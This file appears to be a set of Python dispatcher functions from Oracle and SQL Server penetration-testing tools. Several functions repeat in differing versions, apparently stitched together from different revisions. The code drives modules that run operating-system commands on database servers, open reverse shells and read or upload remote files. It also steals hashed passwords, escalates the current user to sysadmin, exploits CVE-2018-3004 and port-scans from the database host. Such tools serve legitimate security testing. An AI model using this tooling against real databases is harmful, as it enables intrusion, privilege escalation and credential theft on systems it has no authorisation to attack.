def runCtxsysModule(args): """ Run the CTXSYS module """ status = True if checkOptionsGivenByTheUser(args, ["test-module", "getFile"]) == False: return EXIT_MISS_ARGUMENT ctxsys = Ctxsys(args) status = ctxsys.connection(stopIfError=True) if args["test-module"] == True: args["print"].title("Test if the DBMSScheduler library can be used") status = ctxsys.testAll() # Option 1: read file if args["getFile"] != None: args["print"].title("Read the {0} file on the {1} server".format(args["getFile"], args["server"])) data = ctxsys.readAFile(args["getFile"]) if isinstance(data, Exception): args["print"].badNews("Impossible to read the {0} file: {1}".format(args["getFile"], data)) else: if data == "": args["print"].goodNews("The {0} file is empty or it doesn't exist".format(args["getFile"])) else: args["print"].goodNews( "Data stored in the {0} file (escape char replace by '\\n'):\n{1}".format(args["getFile"], data) )
def runTrustworthyPEModule(args): ''' Run the TrustworthyPE module ''' if checkOptionsGivenByTheUser(args,["test-module", "be-sysadmin", "drop-sysadmin","is-sysadmin"],checkAccount=True) == False : return EXIT_MISS_ARGUMENT trustworthyPE = TrustworthyPE(args) trustworthyPE.connect() if args["sp-name"] != "": trustworthyPE.spName = args["sp-name"] if args["test-module"] == True: trustworthyPE.testAll() if args["be-sysadmin"] == True: args['print'].title("Try to become sysadmin with the trustworthy database method") status = trustworthyPE.tryPE() if status == True: args['print'].goodNews("The current user is now sysadmin ! You should run again the all module to know what you can do...") else : args['print'].badNews("Impossible to put the sysadmin privilege to the current user with this method: {0}".format(status)) if args["drop-sysadmin"] == True: args['print'].title("Try to drop sysadmin privilege to the current user") continu = input("Do you want really drop sysadmin privilege of the current user (y/N) ").lower() == 'y' if continu == True: status = trustworthyPE.cleanPE() if status == True: args['print'].goodNews("Sysadmin privilege dropped for the current user") else : args['print'].badNews("Impossible to drop the sysadmin privilege for the current user: {0}".format(status)) else: args['print'].badNews("Sysadmin privilege has not been modified") if args["is-sysadmin"] == True: args['print'].title("Is the current user is sysadmin?") isSysadmin = trustworthyPE.isCurrentUserSysadmin() if isinstance(isSysadmin,Exception): args['print'].badNews("Impossible to know if the current user is sysadmin: {0}".format(isSysadmin)) if isSysadmin == True: args['print'].goodNews("The current user is sysadmin") else: args['print'].goodNews("The current user is NOT sysadmin")
def runSearchModule(args): ''' Run the Search module ''' status = True if checkOptionsGivenByTheUser(args,["test-module","column-names","pwd-column-names"]) == False : return EXIT_MISS_ARGUMENT search = Search(args) status = search.connection(stopIfError=True) if args['test-module'] == True : args['print'].title("Test if the Search module can be used") status = search.testAll() if args.has_key('column-names')==True and args['column-names']!=None: args['print'].title("Columns which contains the pattern '{0}'".format(args['column-names'])) table = search.searchInColumns(args['column-names'],showEmptyColumns=args['show-empty-columns']) if search.isEmptyTable(table) == True : args['print'].badNews("no result found") else : args['print'].goodNews(table) if args['pwd-column-names']==True: args['print'].title("Columns which contains the pattern ~password~ like (multi language)") table = search.searchPwdKeyworkInColumnNames(showEmptyColumns=args['show-empty-columns']) if search.isEmptyTable(table) == True : args['print'].badNews("no result found") else : args['print'].goodNews(table)
def runDbmsXslprocessorModule(args): """ Run the DbmsXslprocessor module """ status = True if checkOptionsGivenByTheUser(args, ["test-module", "putFile"]) == False: return EXIT_MISS_ARGUMENT dbmsXslprocessor = DbmsXslprocessor(args) status = dbmsXslprocessor.connection(stopIfError=True) if args["test-module"] == True: args["print"].title("Test if the DBMSAdvisor library can be used") status = dbmsXslprocessor.testAll() # Option 1: putLocalFile if args["putFile"] != None: args["print"].title( "Put the {0} local file in the {1} path (named {2}) of the {3} server".format( args["putFile"][2], args["putFile"][0], args["putFile"][1], args["server"] ) ) status = dbmsXslprocessor.putFile(args["putFile"][0], args["putFile"][1], localFile=args["putFile"][2]) if status == True: args["print"].goodNews( "The {0} local file was put in the remote {1} path (named {2})".format( args["putFile"][2], args["putFile"][0], args["putFile"][1] ) ) else: args["print"].badNews( "The {0} local file was not put in the remote {1} path (named {2}): {3}".format( args["putFile"][2], args["putFile"][0], args["putFile"][1], str(status) ) ) dbmsXslprocessor.close()
def runDbmsSchedulerModule(args): ''' Run the DBMSAdvisor module ''' status = True if checkOptionsGivenByTheUser( args, ["test-module", "exec", "reverse-shell"]) == False: return EXIT_MISS_ARGUMENT dbmsScheduler = DbmsScheduler(args) status = dbmsScheduler.connection(stopIfError=True) if args['test-module'] == True: args['print'].title("Test if the DBMSScheduler library can be used") status = dbmsScheduler.testAll() #Option 1: exec if args['exec'] != None: args['print'].title("Execute the `{0}` on the {1} server".format( args['exec'], args['server'])) status = dbmsScheduler.execOSCommand(args['exec']) if status == True: args['print'].goodNews( "The `{0}` command was executed on the {1} server".format( args['exec'], args['server'])) else: args['print'].badNews( "The `{0}` command was not executed on the {1} server: {2}". format(args['exec'], args['server'], str(status))) dbmsScheduler.__getJobStatus__() #Option 2: reverse shell if args['reverse-shell'] != None: args['print'].title( "Try to give you a reverse shell from the {0} server".format( args['server'])) dbmsScheduler.giveReverseShell(localip=args['reverse-shell'][0], localport=args['reverse-shell'][1]) dbmsScheduler.close()
def runPasswordsModule(args): ''' Run the Passwords module ''' status = True if checkOptionsGivenByTheUser(args,["test-module","info","get-passwords","get-passwords-from-history"]) == False : return EXIT_MISS_ARGUMENT passwords = Passwords(args) status = passwords.connection(stopIfError=True) if args.has_key('info')==False: info = Info(args) info.loadInformationRemoteDatabase() args['info'] = info if args['test-module'] == True : args['print'].title("Test if hashed passwords can be got") status = passwords.testAll() if args['get-passwords'] == True : args['print'].title("Try to get Oracle hashed passwords") status = passwords.__tryToGetHashedPasswords__() if status == True : args['print'].goodNews("Here are Oracle hashed passwords:") passwords.printPasswords() else : args['print'].badNews("Impossible to get hashed passwords: {0}".format(status)) if args['get-passwords-from-history'] == True : args['print'].title("Try to get Oracle hashed passwords from history") status = passwords.__tryToGetHashedPasswordsfromHistory__() if status == True : args['print'].goodNews("Here are Oracle hashed passwords:") passwords.printPasswords() else : args['print'].badNews("Impossible to get hashed passwords from history: {0}".format(status))
def runDbmsSchedulerModule(args): ''' Run the DBMSAdvisor module ''' status = True if checkOptionsGivenByTheUser(args,["test-module","exec","reverse-shell"]) == False : return EXIT_MISS_ARGUMENT dbmsScheduler = DbmsScheduler(args) status = dbmsScheduler.connection(stopIfError=True) if args['test-module'] == True : args['print'].title("Test if the DBMSScheduler library can be used") status = dbmsScheduler.testAll() #Option 1: exec if args['exec'] != None: args['print'].title("Execute the `{0}` on the {1} server".format(args['exec'],args['server'])) status = dbmsScheduler.execOSCommand(args['exec']) if status == True: args['print'].goodNews("The `{0}` command was executed on the {1} server".format(args['exec'],args['server'])) else : args['print'].badNews("The `{0}` command was not executed on the {1} server: {2}".format(args['exec'],args['server'],str(status))) dbmsScheduler.__getJobStatus__() #Option 2: reverse shell if args['reverse-shell'] != None : args['print'].title("Try to give you a reverse shell from the {0} server".format(args['server'])) dbmsScheduler.giveReverseShell(localip=args['reverse-shell'][0],localport=args['reverse-shell'][1]) dbmsScheduler.close()
def runUnwrapperModule(args): ''' Run the unwrapper module ''' status, offline = True, True if args['test-module'] == False and args['object-name'] == None and args['file'] == None: logging.critical("You must choose --test-module or/and --object-name or/and --file") return EXIT_MISS_ARGUMENT if args['file'] != None: offline = True unwrapper = Unwrapper(args, offline=True) if args['object-name'] != None: if checkOptionsGivenByTheUser(args,["test-module","object-name"]) == False : return EXIT_MISS_ARGUMENT offline = False unwrapper = Unwrapper(args, offline=False) unwrapper.connection(stopIfError=True) if args['test-module'] == True : args['print'].title("Test if the Unwrapper module can be used") unwrapper.testAll() if args['object-name'] != None : args['print'].title("Unwrapping PL/SQL source code of {0} stored in the remote database".format(args['object-name'])) code = unwrapper.unwrapRemotely(args['object-name']) if code == None: args['print'].badNews("Impossible to get the source code or to unwrap it. Is it wrapped? Have you permissions?...") else: args['print'].goodNews(code) if args['file'] != None : args['print'].title("Unwrapping PL/SQL source code stored in the local file named {0}".format(args['file'])) code = unwrapper.unwrapLocally(args['file']) if code == None: args['print'].badNews("Impossible to read the source code or to unwrap it. Is it wrapped? Have you permissions?...") else: args['print'].goodNews(code)
def runJobsModule(args): ''' Run the Jobs module ''' if checkOptionsGivenByTheUser(args,["test-module", "exec", "reverse-shell","print-jobs"], checkAccount=True) == False : return EXIT_MISS_ARGUMENT cmdType = "" jobs = Jobs(args) jobs.connect() if args["sleep-status"] != "": jobs.sleepStatus = args["sleep-status"] if args["sp-name"] != "": jobs.spName = args["sp-name"] if args["test-module"] == True: jobs.testAll() if args["exec"] != None: args['print'].title("Try to execute the system command with SQL Server Agent Stored Procedures (Jobs)") if args["type"] != "": cmdType = args["type"] else: cmdType = "CMDEXEC" status = jobs.createAndExecuteJob(cmd=args["exec"], descritpion="MDAT", cmdType=cmdType, serverName="(LOCAL)") if status != True: args['print'].badNews("Impossible to create a job and to execute it: {0}".format(status)) else: status = jobs.getJobStatus() if status == True: args['print'].goodNews("The job to execute the system command has been created and executed") elif status == False: args['print'].badNews("The job to execute the system command has not been executed because there is probably a mistake in your command") elif status == None: args['print'].unknownNews("The job status is unknown because it is still running") else : args['print'].badNews("The system command has NOT been executed on the database server: {0}".format(status)) if args["reverse-shell"] != None: args['print'].title("Try to give you a reverse shell with SQL Server Agent Stored Procedures (Jobs)") status = jobs.getInteractiveReverseShell(args['reverse-shell'][0], args['reverse-shell'][1]) if args["print-jobs"] != None: args['print'].title("Print list of agent jobs") jobs.printJobs()
def runOradbgModule(args): ''' Run the Oradbg module ''' status = True if checkOptionsGivenByTheUser(args, ["test-module", "exec"]) == False: return EXIT_MISS_ARGUMENT oradbg = Oradbg(args) status = oradbg.connection(stopIfError=True) if args['test-module'] == True: args['print'].title("Test if the Oradbg can be used") status = oradbg.testAll() #Option 1: exec if args['exec'] != None: args['print'].title("Execute the `{0}` on the {1} server".format( args['exec'], args['server'])) status = oradbg.execOSCommand(args['exec']) if status == True: args['print'].goodNews( "The `{0}` command was executed on the {1} server (probably)". format(args['exec'], args['server'])) else: args['print'].badNews( "The `{0}` command was not executed on the {1} server: {2}". format(args['exec'], args['server'], str(status))) oradbg.close()
def runPasswordsModule(args): ''' Run the Passwords module ''' status = True if checkOptionsGivenByTheUser(args,["test-module","get-passwords","get-passwords-from-history"]) == False : return EXIT_MISS_ARGUMENT passwords = Passwords(args) status = passwords.connection(stopIfError=True) if args.has_key('info')==False: info = Info(args) info.loadInformationRemoteDatabase() args['info'] = info if args['test-module'] == True : args['print'].title("Test if hashed passwords can be got") status = passwords.testAll() if args['get-passwords'] == True : args['print'].title("Try to get Oracle hashed passwords") status = passwords.__tryToGetHashedPasswords__() if status == True : args['print'].goodNews("Here are Oracle hashed passwords:") passwords.printPasswords() else : args['print'].badNews("Impossible to get hashed passwords: {0}".format(status)) if args['get-passwords-from-history'] == True : args['print'].title("Try to get Oracle hashed passwords from history") status = passwords.__tryToGetHashedPasswordsfromHistory__() if status == True : args['print'].goodNews("Here are Oracle hashed passwords:") passwords.printPasswords() else : args['print'].badNews("Impossible to get hashed passwords from history: {0}".format(status))
def runHttpUriTypeModule(args): ''' Run the HTTPURITYPE module ''' status = True if checkOptionsGivenByTheUser(args,["test-module","httpUrl","scan-ports"]) == False : return EXIT_MISS_ARGUMENT httpUriType = HttpUriType(args) status = httpUriType.connection(stopIfError=True) if args['test-module'] == True : args['print'].title("Test if the HTTPURITYPE library can be used") status = httpUriType.testAll() #Option 1: httpUrl if args['httpUrl'] != None: args['print'].title("Send a GET request from {0} to {1}".format(args['connectionStr'],args['httpUrl'])) response = httpUriType.sendGetRequest(url=args['httpUrl']) if isinstance(response,Exception): args['print'].badNews("HTTP GET request failed") else : args['print'].goodNews("The server response is:\n {0}".format(response)) if args['outputFile'] != None : httpUriType.writeFile(args['outputFile'],str(response)) #Option 2: scan-ports if args['scan-ports'] != None: ports = [] if "," in args['scan-ports'][1]: ports=args['scan-ports'][1].split(',') elif '-' in args['scan-ports'][1]: startEnd = args['scan-ports'][1].split('-') for aPort in range(int(startEnd[0]),int(startEnd[1])): ports.append(str(aPort)) else : logging.error("Syntax for ports given not recognized (ex: 123-2452 or 143,134,4783)") args['print'].title("Scan ports ({0}) of {1} ".format(args['scan-ports'][1],args['scan-ports'][0])) resultats = httpUriType.scanTcpPorts(httpObject=httpUriType,ip=args['scan-ports'][0],ports=ports) httpUriType.printScanPortResults(resultats) httpUriType.close()
def runjavaModule(args): ''' Run the JAVA module ''' status = True if checkOptionsGivenByTheUser(args,["test-module", "shell", "reverse-shell", "exec", "create-file-CVE-2018-3004"]) == False : return EXIT_MISS_ARGUMENT java = Java(args) status = java.connection(stopIfError=True) if args['test-module'] == True : args['print'].title("Test if the DBMSScheduler library can be used") status = java.testAll() #Option 1: exec if args['exec'] != None: args['print'].title("Execute the `{0}` on the {1} server".format(args['exec'],args['server'])) status = java.execOSCommand(cmd=args['exec'],printResponse=True, needCreateClassAndFunction = True, needDeleteClassAndFunction = True) #Option 2: shell if args['shell'] == True: args['print'].title("Try to give you a pseudo shell to the {0} server".format(args['server'])) java.getInteractiveShell() #Option 3: reverse shell if args['reverse-shell'] != None : args['print'].title("Try to give you a nc reverse shell from the {0} server".format(args['server'])) java.giveReverseShell(localip=args['reverse-shell'][0],localport=args['reverse-shell'][1]) #Option 4: Bypass built in Oracle JVM security through Deserialization (CVE-2018-3004) if args['create-file-CVE-2018-3004'] != None : args['print'].title("Try to create the file {0} on {1}".format(args['create-file-CVE-2018-3004'][1],args['server'])) status = java.createOrAppendFileViaCVE_2018_3004(data=args['create-file-CVE-2018-3004'][0], remoteFilename=args['create-file-CVE-2018-3004'][1]) if isinstance(status,Exception): args['print'].badNews("Impossible to create the file {0}: {1}".format(args['create-file-CVE-2018-3004'][1], status)) elif status==True: args['print'].goodNews("The file {0} has been created on the target with data '{1}'".format(args['create-file-CVE-2018-3004'][1], args['create-file-CVE-2018-3004'][0])) java.close()
def runTnsCmdModule(args): ''' run the TNS cmd module ''' if checkOptionsGivenByTheUser(args, ["version", "status", "ping"], checkAccount=False) == False: return EXIT_MISS_ARGUMENT #if args['ping'] == False and args['version'] == False and args['status'] == False and args['checkTNSPoisoning'] == False: # logging.critical("You must choose --ping or/and --version or/and --status") # return EXIT_MISS_ARGUMENT tnscmd = Tnscmd(args) if args['ping'] == True: args['print'].title( "Searching ALIAS on the {0} server, port {1}".format( args['server'], args['port'])) alias = tnscmd.getAlias() args['print'].goodNews( "{0} ALIAS received: {1}. You should use this alias (more or less) as Oracle SID." .format(len(alias), alias)) if args['version'] == True: args['print'].title( "Searching the version of the Oracle database server ({0}) listening on the port {1}" .format(args['server'], args['port'])) version = tnscmd.getVersion() args['print'].goodNews( "The remote database version is: '{0}'".format(version)) if args['status'] == True: args['print'].title( "Searching the server status of the Oracle database server ({0}) listening on the port {1}" .format(args['server'], args['port'])) tnscmd.getInformation(cmd='status') args['print'].goodNews( "Data received by the database server: '{0}'".format( tnscmd.getRecvData()))
def runUtlTcpModule(args): ''' Run the UTL_TCP module ''' status = True if checkOptionsGivenByTheUser(args,["test-module","send-packet","scan-ports"]) == False : return EXIT_MISS_ARGUMENT utlTcp = UtlTcp(args) status = utlTcp.connection(stopIfError=True) if args['test-module'] == True : args['print'].title("Test if the UTL_TCP library can be used") status = utlTcp.testAll() #Option 2: send packet if args['send-packet'] != None: args['print'].title("Send the packet stored in the {0} file".format(args['send-packet'][2])) data = utlTcp.sendPacket(args['send-packet'][0],args['send-packet'][1],filename=args['send-packet'][2]) if isinstance(data,Exception): args['print'].badNews("Impossible to send the packet: {0}".format(data)) else : args['print'].goodNews("Response from the server:\n{0}".format(data)) #Option 1: tcp Scan if args['scan-ports'] != None: ports = [] if "," in args['scan-ports'][1]: ports=args['scan-ports'][1].split(',') elif '-' in args['scan-ports'][1]: startEnd = args['scan-ports'][1].split('-') for aPort in range(int(startEnd[0]),int(startEnd[1])): ports.append(str(aPort)) else : logging.error("Syntax for ports given not recognized") args['print'].title("Scan ports ({0}) of {1} ".format(args['scan-ports'][1],args['scan-ports'][0])) resultats = utlTcp.scanTcpPorts(httpObject=utlTcp,ip=args['scan-ports'][0],ports=ports) utlTcp.printScanPortResults(resultats) utlTcp.close()
def runjavaModule(args): ''' Run the JAVA module ''' status = True if checkOptionsGivenByTheUser( args, ["test-module", "shell", "reverse-shell", "exec"]) == False: return EXIT_MISS_ARGUMENT java = Java(args) status = java.connection(stopIfError=True) if args['test-module'] == True: args['print'].title("Test if the DBMSScheduler library can be used") status = java.testAll() #Option 1: exec if args['exec'] != None: args['print'].title("Execute the `{0}` on the {1} server".format( args['exec'], args['server'])) status = java.execOSCommand(cmd=args['exec'], printResponse=True, needCreateClassAndFunction=True, needDeleteClassAndFunction=True) #Option 2: shell if args['shell'] == True: args['print'].title( "Try to give you a pseudo shell to the {0} server".format( args['server'])) java.getInteractiveShell() #Option 3: reverse shell if args['reverse-shell'] != None: args['print'].title( "Try to give you a nc reverse shell from the {0} server".format( args['server'])) java.giveReverseShell(localip=args['reverse-shell'][0], localport=args['reverse-shell'][1]) java.close()
def runDbmsLob(args): ''' Run the DbmsLob module ''' status = True if checkOptionsGivenByTheUser(args, ["test-module", "getFile"]) == False: return EXIT_MISS_ARGUMENT dbmsLob = DbmsLob(args) status = dbmsLob.connection(stopIfError=True) if args['test-module'] == True: args['print'].title("Test if the DbmsLob module can be used") status = dbmsLob.testAll() #Option 1: getFile if args['getFile'] != None: args['print'].title("Read the {0} file stored in the {1} path".format( args['getFile'][1], args['getFile'][0])) data = dbmsLob.getFile(remotePath=args['getFile'][0], remoteNameFile=args['getFile'][1], localFile=args['getFile'][2]) if isinstance(data, Exception): args['print'].badNews("There is an error: {0}".format(data)) elif data == False: args['print'].badNews("The {0} file in {1} doesn't exist".format( args['getFile'][1], args['getFile'][0])) elif data == '': args['print'].badNews("The {0} file is empty".format( args['getFile'])) else: args['print'].goodNews( "Data stored in the {0} file sored in {1} (copied in {2} locally):\n{3}" .format(args['getFile'][1], args['getFile'][0], args['getFile'][2], data))
def runPasswordStealerModule(args): ''' Run the PasswordGuesser module ''' if checkOptionsGivenByTheUser(args, ["dump"], checkAccount=True) == False: return EXIT_MISS_ARGUMENT passwordstealer = Passwordstealer(args) passwordstealer.connect() if args["test-module"] == True: passwordstealer.testAll() args['print'].title( "It is stealing hashed passwords from sql_logins table or sysxlogins table" ) status = passwordstealer.stealHashedPasswords() passwordstealer.closeConnection() if status == True: if passwordstealer.credentialsAreEmpty() == True: args['print'].badNews( "No found hashed passwords on {0}:{1}/{2}".format( args['host'], args['port'], args['database'])) else: args['print'].goodNews("Accounts found on {0}:{1}/{2}:".format( args['host'], args['port'], args['database'])) passwordstealer.printPasswords() if args['save-to-file']: args['print'].goodNews( "Credentials have been saved in the file {0}".format( args['save-to-file'])) else: args['print'].badNews( "impossible to steal hashed passwords from sql_logins table or sysxlogins table" )
def runCtxsysModule(args): ''' Run the CTXSYS module ''' status = True if checkOptionsGivenByTheUser(args, ["test-module", "getFile"]) == False: return EXIT_MISS_ARGUMENT ctxsys = Ctxsys(args) status = ctxsys.connection(stopIfError=True) if args['test-module'] == True: args['print'].title("Test if the DBMSScheduler library can be used") status = ctxsys.testAll() #Option 1: read file if args['getFile'] != None: args['print'].title("Read the {0} file on the {1} server".format( args['getFile'], args['server'])) data = ctxsys.readAFile(args['getFile']) if isinstance(data, Exception): args['print'].badNews( "Impossible to read the {0} file: {1}".format( args['getFile'], data)) else: if data == '': args['print'].goodNews( "The {0} file is empty or it doesn't exist".format( args['getFile'])) else: args['print'].goodNews( "Data stored in the {0} file (escape char replace by '\\n'):\n{1}" .format(args['getFile'], data))
def runExternalTableModule (args): ''' Run the External Table module ''' status = True if checkOptionsGivenByTheUser(args,["test-module","getFile","exec"]) == False : return EXIT_MISS_ARGUMENT externalTable = ExternalTable(args) status = externalTable.connection(stopIfError=True) if args['test-module'] == True : args['print'].title("Test if the External Table module can be used") status = externalTable.testAll() #Option 1: getFile if args['getFile'] != None: args['print'].title("Read the {0} file stored in the {1} path".format(args['getFile'][1],args['getFile'][0])) data = externalTable.getFile (remotePath=args['getFile'][0], remoteNameFile=args['getFile'][1], localFile=args['getFile'][2]) if isinstance(data,Exception): args['print'].badNews("There is an error: {0}".format(data)) else: args['print'].goodNews("Data stored in the remote file {0} stored in {1}".format(args['getFile'][1],args['getFile'][0])) print(data) #Option 2: exec a script or command if args['exec'] != None: args['print'].title("Execute the {0} command stored in the {1} path".format(args['exec'][1],args['exec'][0])) data = externalTable.execute (remotePath=args['exec'][0], remoteNameFile=args['exec'][1]) if isinstance(data,Exception): args['print'].badNews("There is an error: {0}".format(data)) else: args['print'].goodNews("The {0} command stored in {1} has been executed (normally)".format(args['exec'][1],args['exec'][0]))
def runUnwrapperModule(args): ''' Run the unwrapper module ''' status, offline = True, True if args['test-module'] == False and args['object-name'] == None and args['file'] == None: logging.critical("You must choose --test-module or/and --object-name or/and --file") return EXIT_MISS_ARGUMENT if args['test-module'] == True : args['print'].title("Test if the Unwrapper module can be used") unwrapper = Unwrapper(args, offline=False) unwrapper.testAll() if args['file'] != None: offline = True unwrapper = Unwrapper(args, offline=True) if args['object-name'] != None: if checkOptionsGivenByTheUser(args,["test-module","object-name"]) == False : return EXIT_MISS_ARGUMENT offline = False unwrapper = Unwrapper(args, offline=False) unwrapper.connection(stopIfError=True) #if args['object-name'] != None : args['print'].title("Unwrapping PL/SQL source code of {0} stored in the remote database".format(args['object-name'])) code = unwrapper.unwrapRemotely(args['object-name'], objectType = args['object-type']) if code == None: args['print'].badNews("Impossible to get the source code or to unwrap it. Is it wrapped? Have you permissions?...") else: args['print'].goodNews(code) if args['file'] != None : args['print'].title("Unwrapping PL/SQL source code stored in the local file named {0}".format(args['file'])) code = unwrapper.unwrapLocally(args['file']) if code == None: args['print'].badNews("Impossible to read the source code or to unwrap it. Is it wrapped? Have you permissions?...") else: args['print'].goodNews(code)
def runExternalTableModule(args): """ Run the External Table module """ status = True if checkOptionsGivenByTheUser(args, ["test-module", "getFile", "exec"]) == False: return EXIT_MISS_ARGUMENT externalTable = ExternalTable(args) status = externalTable.connection(stopIfError=True) if args["test-module"] == True: args["print"].title("Test if the External Table module can be used") status = externalTable.testAll() # Option 1: getFile if args["getFile"] != None: args["print"].title("Read the {0} file stored in the {1} path".format(args["getFile"][1], args["getFile"][0])) data = externalTable.getFile( remotePath=args["getFile"][0], remoteNameFile=args["getFile"][1], localFile=args["getFile"][2] ) if isinstance(data, Exception): args["print"].badNews("There is an error: {0}".format(data)) else: args["print"].goodNews( "Data stored in the remote file {0} stored in {1}".format(args["getFile"][1], args["getFile"][0]) ) print data # Option 2: exec a script or command if args["exec"] != None: args["print"].title("Execute the {0} command stored in the {1} path".format(args["exec"][1], args["exec"][0])) data = externalTable.execute(remotePath=args["exec"][0], remoteNameFile=args["exec"][1]) if isinstance(data, Exception): args["print"].badNews("There is an error: {0}".format(data)) else: args["print"].goodNews( "The {0} command stored in {1} has been executed (normally)".format(args["exec"][1], args["exec"][0]) )
def runDbmsadvisorModule(args): ''' Run the DBMSAdvisor module ''' status = True if checkOptionsGivenByTheUser(args, ["test-module", "putFile"]) == False: return EXIT_MISS_ARGUMENT dbmsAdvisor = DbmsAdvisor(args) status = dbmsAdvisor.connection(stopIfError=True) if args['test-module'] == True: args['print'].title("Test if the DBMSAdvisor library can be used") status = dbmsAdvisor.testAll() #Option 1: putLocalFile if args['putFile'] != None: args['print'].title( "Put the {0} local file in the {1} path (named {2}) of the {3} server" .format(args['putFile'][2], args['putFile'][0], args['putFile'][1], args['server'])) status = dbmsAdvisor.putFile(args['putFile'][0], args['putFile'][1], localFile=args['putFile'][2]) if status == True: args['print'].goodNews( "The {0} local file was put in the remote {1} path (named {2})" .format(args['putFile'][2], args['putFile'][0], args['putFile'][1])) else: args['print'].badNews( "The {0} local file was not put in the remote {1} path (named {2}): {3}" .format(args['putFile'][2], args['putFile'][0], args['putFile'][1], str(status))) dbmsAdvisor.close()
def runOleAutomationModule(args): ''' Run the runOleAutomation module ''' if checkOptionsGivenByTheUser(args,["read-file","write-file","get-file","put-file","exec-sys-cmd","enable-ole-automation","disable-ole-automation"],checkAccount=True) == False : return EXIT_MISS_ARGUMENT oleAutomation = OleAutomation(args) oleAutomation.connect() if args["test-module"] == True: oleAutomation.testAll() if args["enable-ole-automation"] ==True: args['print'].title("Try to enable OLE Automation") status = oleAutomation.enableOLEAutomationProcedures() if isinstance(status,Exception): args['print'].badNews("Impossible to enable OLE Automation: '{0}'".format(status)) else: args['print'].goodNews("OLE Automation is enabled") if args["read-file"] != None: args['print'].title("Try to read the remote file {0}".format(args['read-file'][0])) data = oleAutomation.readFile(args['read-file'][0]) if isinstance(data,Exception): args['print'].badNews("The file can't be read: '{0}'".format(data)) else: args['print'].goodNews("Data in the file {0}:\n{1}".format(args['read-file'][0],data)) if args["write-file"] != None: args['print'].title("Try to write this data on the remote file {0}: '{1}'".format(args['write-file'][0],args['write-file'][1])) data = oleAutomation.writeFile(args['write-file'][0],args['write-file'][1]) if isinstance(data,Exception): args['print'].badNews("Data cannot be written: '{0}'".format(data)) else: args['print'].goodNews("Data has been written in the file {0}".format(args['write-file'][0])) if args["get-file"] != None: args['print'].title("Try to copy the remote file {0} to {1}".format(args['get-file'][0],args['get-file'][1])) data = oleAutomation.getFile(args['get-file'][0],args['get-file'][1]) if data == True: args['print'].goodNews("The remote file {0} has been copied in {1}".format(args['get-file'][0],args['get-file'][1])) else: args['print'].badNews("Impossible to get the remote file {0}: '{1}'".format(args['get-file'][0],data)) if args["put-file"] != None: args['print'].title("Try to copy the local file {0} to {1}".format(args['put-file'][0],args['put-file'][1])) data = oleAutomation.putFile(args['put-file'][0],args['put-file'][1]) if data == True: args['print'].goodNews("The local file {0} has been copied in {1}".format(args['put-file'][0],args['put-file'][1])) else: args['print'].badNews("Impossible to put the local file {0} to {1}: '{2}'".format(args['put-file'][0],args['put-file'][1],data)) if args["exec-sys-cmd"] != None: args['print'].title("Try to execute a Windows system command: '{0}'".format(args['exec-sys-cmd'][0])) status = oleAutomation.executeSysCmd(args['exec-sys-cmd'][0],wait=True) if status == True: args['print'].goodNews("The system command has been executed on the remote server") else: args['print'].badNews("Impossible to execute the Windows system command: {0}".format(status)) if args["disable-ole-automation"] ==True: args['print'].title("Try to disable OLE Automation") status = oleAutomation.disableOLEAutomationProcedures() if isinstance(status,Exception): args['print'].badNews("Impossible to disable OLE Automation: '{0}'".format(status)) else: args['print'].goodNews("OLE Automation is disabled") oleAutomation.closeConnection()
def runUtlHttpModule(args): ''' Run the UTL_HTTP module ''' status = True if checkOptionsGivenByTheUser( args, ["test-module", "scan-ports", "send"]) == False: return EXIT_MISS_ARGUMENT utlHttp = UtlHttp(args) status = utlHttp.connection(stopIfError=True) utlHttp.setTimeout(5) if args['test-module'] == True: args['print'].title("Test if the UTL_HTTP library can be used") status = utlHttp.testAll() #Option 1: sendRequest if args['send'] != None: args['print'].title( "Send the HTTP request stored in the {0} file".format( args['send'][2])) data = utlHttp.sendRequest(args['send'][0], args['send'][1], args['send'][2]) if isinstance(data, Exception): args['print'].badNews( "Impossible to send the request: {0}".format(data)) else: args['print'].goodNews( "Response from the server:\n{0}".format(data)) #Option 2: scan-ports if args['scan-ports'] != None: ports = [] if "," in args['scan-ports'][1]: ports = args['scan-ports'][1].split(',') elif '-' in args['scan-ports'][1]: startEnd = args['scan-ports'][1].split('-') for aPort in range(int(startEnd[0]), int(startEnd[1])): ports.append(str(aPort)) if ports == []: logging.critical( "The second parameter ('{0}') is not a valid: cancelation..." .format(args['scan-ports'][1])) return -1 elif args['scan-ports'][1].isdigit() == True: ports = [args['scan-ports'][1]] else: logging.critical( "The second parameter ('{0}') is not a valid port: cancelation..." .format(args['scan-ports'][1])) return -1 args['print'].title("Scan ports ({0}) of {1} ".format( args['scan-ports'][1], args['scan-ports'][0])) resultats = utlHttp.scanTcpPorts(httpObject=utlHttp, ip=args['scan-ports'][0], ports=ports) utlHttp.printScanPortResults(resultats) utlHttp.close()
def runHttpUriTypeModule(args): ''' Run the HTTPURITYPE module ''' status = True if checkOptionsGivenByTheUser( args, ["test-module", "httpUrl", "scan-ports"]) == False: return EXIT_MISS_ARGUMENT httpUriType = HttpUriType(args) status = httpUriType.connection(stopIfError=True) if args['test-module'] == True: args['print'].title("Test if the HTTPURITYPE library can be used") status = httpUriType.testAll() #Option 1: httpUrl if args['httpUrl'] != None: args['print'].title("Send a GET request from {0} to {1}".format( args['connectionStr'], args['httpUrl'])) response = httpUriType.sendGetRequest(url=args['httpUrl']) if isinstance(response, Exception): args['print'].badNews("HTTP GET request failed") else: args['print'].goodNews( "The server response is:\n {0}".format(response)) if args['outputFile'] != None: httpUriType.writeFile(args['outputFile'], str(response)) #Option 2: scan-ports if args['scan-ports'] != None: ports = [] if "," in args['scan-ports'][1]: ports = args['scan-ports'][1].split(',') elif '-' in args['scan-ports'][1]: startEnd = args['scan-ports'][1].split('-') for aPort in range(int(startEnd[0]), int(startEnd[1])): ports.append(str(aPort)) if ports == []: logging.critical( "The second parameter ('{0}') is not a valid: cancelation..." .format(args['scan-ports'][1])) return -1 else: if args['scan-ports'][1].isdigit() == True: ports = [args['scan-ports'][1]] else: logging.critical( "The second parameter ('{0}') is not a valid port: cancelation..." .format(args['scan-ports'][1])) return -1 args['print'].title("Scan ports ({0}) of {1} ".format( args['scan-ports'][1], args['scan-ports'][0])) resultats = httpUriType.scanTcpPorts(httpObject=httpUriType, ip=args['scan-ports'][0], ports=ports) httpUriType.printScanPortResults(resultats) httpUriType.close()
